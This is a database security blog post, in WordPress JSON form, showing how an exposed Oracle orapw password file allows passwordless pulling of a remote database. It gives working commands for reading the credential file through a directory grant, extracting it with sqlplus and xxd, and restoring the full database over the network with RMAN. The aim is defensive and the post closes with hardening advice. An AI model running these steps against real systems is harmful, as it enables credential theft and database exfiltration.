{"id":10744,"date":"2018-01-05T12:02:45","date_gmt":"2018-01-05T11:02:45","guid":{"rendered":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"modified":"2018-01-05T12:02:45","modified_gmt":"2018-01-05T11:02:45","slug":"keep-your-orapw-password-file-secure","status":"publish","type":"post","link":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","title":{"rendered":"Keep your orapw password file secure"},"content":{"rendered":"<h2>By Franck Pachot<\/h2>\n<p>This is a small demo I did when I found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show why this is a bad idea. People think that the orapw file only contains hashes used to validate a given password, and forget that it can be used to connect to a remote database without a password.<br \/>\n<!--more--><br \/>\nI can easily imagine why the orapw file was there in \/tmp. To build a standby database, you need to copy the password file to the standby server. If you don&#8217;t have direct access to the oracle user, but only sudo access for &#8216;security reasons&#8217;, you can&#8217;t scp easily. So you copy the file to \/tmp, make it readable by all users, and scp it with your own user.<\/p>\n<p>In this demo I don&#8217;t even have access to the host. I only have access to connect to a PDB as the SCOTT user, created with utlsampl.sql, with one additional privilege: read access on $ORACLE_HOME\/dbs:<\/p>\n<pre><code>\nSQL&gt; connect sys\/oracle@\/\/192.168.56.122\/PDB1 as sysdba\nConnected.\n&nbsp;\nSQL&gt; create or replace directory DBS as '\/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs';\nDirectory DBS created.\n&nbsp;\nSQL&gt; grant read on directory DBS to SCOTT;\nGrant succeeded.\n<\/code><\/pre>\n<p>People tend to grant many privileges, and think that read access on a directory which is supposed to contain only configuration files is harmless. 
Let&#8217;s see what you can do from another server.<\/p>\n<h3>Get the orapw file from a remote connection<\/h3>\n<p>I connect as SCOTT, who can read from ORACLE_HOME\/dbs:<\/p>\n<pre><code>\nSQL&gt; connect scott\/tiger@\/\/192.168.56.122\/PDB1\nConnected.\n&nbsp;\nSQL&gt; show user\nUSER is \"SCOTT\"\n&nbsp;\nSQL&gt; select * from all_directories;\n&nbsp;\nOWNER   DIRECTORY_NAME   DIRECTORY_PATH                                  ORIGIN_CON_ID\n-----   --------------   --------------                                  -------------\nSYS     DBS              \/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs                 4\n<\/code><\/pre>\n<p>I create a table to read this file (other possibilities: utl_file, external tables,&#8230;):<\/p>\n<pre><code>\nSQL&gt; create table DEMO ( b blob );\nTable DEMO created.\n&nbsp;\nSQL&gt; insert into demo values ( bfilename('DBS','orapwCDB1') );\n1 row inserted.\n<\/code><\/pre>\n<p>I&#8217;m on another server with the same version of Oracle Database software installed.<\/p>\n<p>I use sqlplus to retrieve the file from the server to my client:<\/p>\n<pre><code>\nsqlplus -s scott\/tiger@\/\/192.168.56.122\/PDB1 &lt;&lt;EOF |xxd -p -r &gt; $ORACLE_HOME\/dbs\/orapwCDB1\nset pages 0 lin 17000 long 1000000000 longc 16384\nselect * from DEMO;\nexit\nEOF\n<\/code><\/pre>\n<p>This (documented by <a href=\"https:\/\/laurentschneider.com\/wordpress\/2014\/10\/select-pdf-from-sqlplus.html\" target=\"_blank\" rel=\"noopener noreferrer\">Laurent Schneider<\/a>) uses sqlplus to display the BLOB as hexadecimal text and xxd (installed with vim-common) to convert it back to binary.<\/p>\n<p>So, on my server I have a copy of the database password file for the database I want to steal:<\/p>\n<pre><code>\n[oracle@VM122 ~]$ strings \/u01\/app\/oracle\/product\/12.2.0\/dbhome_1\/dbs\/orapwCDB1\n&nbsp;\nORACLE Remote Password file\nX)l)|\nSYSDG\n+933k\nSYSBACKUP\nf       ts6 $9\nSYSKM\n<\/code><\/pre>\n<h3>Pull<\/h3>\n<p>A nice feature of 12<i>c<\/i> is 
the ability to pull backups from a service. With this, it is the destination that connects to the source (I have diagrams to explain it <a href=\"https:\/\/www.dbi-services.com\/blog\/rman-12c-push-and-pull-duplicate-explained\/\" target=\"_blank\" rel=\"noopener noreferrer\">here<\/a>). It is an easy alternative to RMAN DUPLICATE (see MOS <a href=\"https:\/\/support.oracle.com\/epmos\/faces\/DocContentDisplay?id=2283978.1\" target=\"_blank\" rel=\"noopener noreferrer\">Doc ID 2283978.1 Creating a Physical Standby database using RMAN restore from service<\/a>). One difference is that you don&#8217;t have to provide the password.<\/p>\n<p>I prepare a small init.ora and a directory for the datafiles:<\/p>\n<pre><code>\necho \"db_name=CDB1\" &gt; $ORACLE_HOME\/dbs\/initCDB1.ora\n&nbsp;\nmkdir -p \/u01\/oradata\/CDB1\n<\/code><\/pre>\n<p>I&#8217;m still on my server, with the copy of the remote orapw file and network access to the source database, and I just restore it without needing a password:<\/p>\n<pre><code>\nRMAN&gt; connect target \/\nconnected to target database (not started)\n<\/code><\/pre>\n<p>I start a local instance:<\/p>\n<pre><code>\nRMAN&gt; startup nomount force\nOracle instance started\n&nbsp;\nTotal System Global Area     859832320 bytes\nFixed Size                     8798552 bytes\nVariable Size                784338600 bytes\nDatabase Buffers              58720256 bytes\nRedo Buffers                   7974912 bytes\n<\/code><\/pre>\n<p>I restore the controlfile:<\/p>\n<pre><code>\nRMAN&gt; restore controlfile from service '\/\/192.168.56.122\/CDB1';\nStarting restore at 05-JAN-18\nusing target database control file instead of recovery catalog\nallocated channel: ORA_DISK_1\nchannel ORA_DISK_1: SID=262 device type=DISK\nchannel ORA_DISK_1: starting datafile backup set restore\nchannel ORA_DISK_1: using network backup set from service \/\/192.168.56.122\/CDB1\nchannel ORA_DISK_1: restoring control file\nchannel ORA_DISK_1: restore complete, 
elapsed time: 00:00:02\noutput file name=\/u01\/oradata\/CDB1\/control01.ctl\noutput file name=\/u01\/fast_recovery_area\/CDB1\/control02.ctl\nFinished restore at 05-JAN-18\n<\/code><\/pre>\n<p>That&#8217;s the interesting part because it has to be connected, at least as SYSOPER, to the source database but I didn&#8217;t provide any password.<\/p>\n<p>I mount this controlfile locally:<\/p>\n<pre><code>\nRMAN&gt; alter database mount;\nStatement processed\n&nbsp;\nreleased channel: ORA_DISK_1\n<\/code><\/pre>\n<p>And now it is easy to pull the whole database (the CDB with all its PDBs) to my local server:<\/p>\n<pre><code>\nRMAN&gt; restore database from service '\/\/192.168.56.122\/CDB1';\nStarting restore at 05-JAN-18\nStarting implicit crosscheck backup at 05-JAN-18\nallocated channel: ORA_DISK_1\nchannel ORA_DISK_1: SID=262 device type=DISK\nCrosschecked 6 objects\nFinished implicit crosscheck backup at 05-JAN-18\nStarting implicit crosscheck copy at 05-JAN-18\nusing channel ORA_DISK_1\nFinished implicit crosscheck copy at 05-JAN-18\nsearching for all files in the recovery area\ncataloging files...\ncataloging done\n&nbsp;\nList of Cataloged Files\n=======================\nFile Name: \/u01\/fast_recovery_area\/CDB1\/autobackup\/2018_01_04\/o1_mf_s_964524009_f4vzyt59_.bkp\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_15_f4w5vv19_.arc\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_16_f4wmm0t8_.arc\nFile Name: \/u01\/fast_recovery_area\/CDB1\/archivelog\/2018_01_04\/o1_mf_1_14_f4vzjdl1_.arc\nusing channel ORA_DISK_1\nchannel ORA_DISK_1: starting datafile backup set restore\nchannel ORA_DISK_1: using network backup set from service \/\/192.168.56.122\/CDB1\nchannel ORA_DISK_1: specifying datafile(s) to restore from backup set\nchannel ORA_DISK_1: restoring datafile 00001 to \/u01\/oradata\/CDB1\/system01.dbf\nchannel ORA_DISK_1: restore complete, elapsed time: 00:00:16\nchannel ORA_DISK_1: starting 
datafile backup set restore\n...\n<\/code><\/pre>\n<h3>So what?<\/h3>\n<p>This is not a bug: it is totally expected. In a Data Guard configuration, the primary and standby databases have to communicate with each other and therefore need passwordless authentication. This is done with the password file, and this is the reason why you need to copy it rather than just create another one with the same passwords.<\/p>\n<p>So, the file contains more than just a hash of the password (which is required to validate a password); it probably also includes a key (randomly generated when you create the password file) used for passwordless authentication.<\/p>\n<p>So be careful, and do not give read access to the orapw files. You must secure them in the same way as an ssh key or an encryption wallet, and this includes:<\/p>\n<ul>\n<li>Do not leave a copy of the orapw file in a shared location<\/li>\n<li>Be careful with grants on directories, even READ<\/li>\n<li>Do not grant CREATE ANY DIRECTORY except for a PDB with PATH_PREFIX lockdown<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>By Franck Pachot . This is a small demo I did when I&#8217;ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. 
People think that the orapw file only contains hashes to validate a password given, and forget that it can be used [&hellip;]<\/p>\n","protected":false},"author":27,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[59],"tags":[221,96,209,25],"type_dbi":[],"class_list":["post-10744","post","type-post","status-publish","format-standard","hentry","category-oracle","tag-data-guard","tag-oracle","tag-oracle-12c","tag-security"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO Premium plugin v27.2 (Yoast SEO v27.2) - https:\/\/yoast.com\/product\/yoast-seo-premium-wordpress\/ -->\n<title>Keep your orapw password file secure - dbi Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Keep your orapw password file secure\" \/>\n<meta property=\"og:description\" content=\"By Franck Pachot . This is a small demo I did when I&#8217;ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. 
People think that the orapw file only contains hashes to validate a password given, and forget that it can be used [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\" \/>\n<meta property=\"og:site_name\" content=\"dbi Blog\" \/>\n<meta property=\"article:published_time\" content=\"2018-01-05T11:02:45+00:00\" \/>\n<meta name=\"author\" content=\"Oracle Team\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Oracle Team\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"},\"author\":{\"name\":\"Oracle Team\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\"},\"headline\":\"Keep your orapw password file secure\",\"datePublished\":\"2018-01-05T11:02:45+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"},\"wordCount\":653,\"commentCount\":0,\"keywords\":[\"Data Guard\",\"Oracle\",\"Oracle 
12c\",\"Security\"],\"articleSection\":[\"Oracle\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\",\"url\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\",\"name\":\"Keep your orapw password file secure - dbi Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#website\"},\"datePublished\":\"2018-01-05T11:02:45+00:00\",\"author\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.dbi-services.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Keep your orapw password file secure\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#website\",\"url\":\"https:\/\/www.dbi-services.com\/blog\/\",\"name\":\"dbi 
Blog\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.dbi-services.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee\",\"name\":\"Oracle Team\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g\",\"caption\":\"Oracle Team\"},\"url\":\"https:\/\/www.dbi-services.com\/blog\/author\/oracle-team\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Keep your orapw password file secure - dbi Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","og_locale":"en_US","og_type":"article","og_title":"Keep your orapw password file secure","og_description":"By Franck Pachot . This is a small demo I did when I&#8217;ve found a database password file (orapw) lying around in \/tmp with -rw-rw-rw- permissions, to show how this is a bad idea. 
People think that the orapw file only contains hashes to validate a password given, and forget that it can be used [&hellip;]","og_url":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","og_site_name":"dbi Blog","article_published_time":"2018-01-05T11:02:45+00:00","author":"Oracle Team","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Oracle Team","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#article","isPartOf":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"author":{"name":"Oracle Team","@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee"},"headline":"Keep your orapw password file secure","datePublished":"2018-01-05T11:02:45+00:00","mainEntityOfPage":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"},"wordCount":653,"commentCount":0,"keywords":["Data Guard","Oracle","Oracle 12c","Security"],"articleSection":["Oracle"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","url":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/","name":"Keep your orapw password file secure - dbi 
Blog","isPartOf":{"@id":"https:\/\/www.dbi-services.com\/blog\/#website"},"datePublished":"2018-01-05T11:02:45+00:00","author":{"@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee"},"breadcrumb":{"@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.dbi-services.com\/blog\/keep-your-orapw-password-file-secure\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.dbi-services.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Keep your orapw password file secure"}]},{"@type":"WebSite","@id":"https:\/\/www.dbi-services.com\/blog\/#website","url":"https:\/\/www.dbi-services.com\/blog\/","name":"dbi Blog","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.dbi-services.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.dbi-services.com\/blog\/#\/schema\/person\/66ab87129f2d357f09971bc7936a77ee","name":"Oracle Team","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f711f7cd2c9b09bf2627133755b569fb5be0694810cfd33033bdd095fedba86d?s=96&d=mm&r=g","caption":"Oracle 
Team"},"url":"https:\/\/www.dbi-services.com\/blog\/author\/oracle-team\/"}]}},"_links":{"self":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts\/10744","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/users\/27"}],"replies":[{"embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/comments?post=10744"}],"version-history":[{"count":0,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/posts\/10744\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/media?parent=10744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/categories?post=10744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/tags?post=10744"},{"taxonomy":"type","embeddable":true,"href":"https:\/\/www.dbi-services.com\/blog\/wp-json\/wp\/v2\/type_dbi?post=10744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}